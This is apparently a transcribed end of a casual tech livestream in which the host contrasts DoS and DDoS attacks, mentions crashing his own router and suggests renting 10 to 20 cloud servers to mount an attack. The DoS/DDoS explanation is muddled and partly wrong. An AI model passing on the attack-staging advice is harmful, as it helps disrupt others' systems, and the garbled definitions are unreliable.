dude. Okay. And where can I find Linux beginning in Discord? I will post it, Akshay. Just a minute. Differentiate between DOS and DDoS attack. So DOS attack is where only your machine attacks the particular machine, or it can be router. So let me tell you my experience. I once attacked my own home router, okay, by DDoS attack, and it stopped working for 10 to 20 minutes, okay. It's most of the machines are really prone to DDoS attack, but in DDoS attack only one machine attacks the target machine, but in DDoS attack like a bunch of machines try to attack, so the machine gets really crashed out there, okay. And this costs a lot of money. The damage that's being done by DDoS attack or DOS attack is really horrible, okay. It costs some lakhs of rupees. So within 2 minutes I'll be ending up the session, okay. So any more questions? Distributed denial of, yes. So you can find DDoS attack, dude, because it comes, most of the machines try to attack it. Okay, you can find the particular one who targeted it. But in DOS attack, only one IP or only one machine is targeting. So actually, it might, yeah, it can be possible. The only thing you can do is you need to buy some servers out there on cloud, whether it can be Google Cloud or AWS. Try to get some 10 to 20 machines and then try to attack, okay. That's the only way you can do it. So thank you guys for coming to the live. So if you're having any more doubts, please post it in my Discord server, okay. I'll definitely help you out, okay, or me or someone else will definitely help you out. So thank you for joining the live, and really thank you once again. So I'm ending the stream.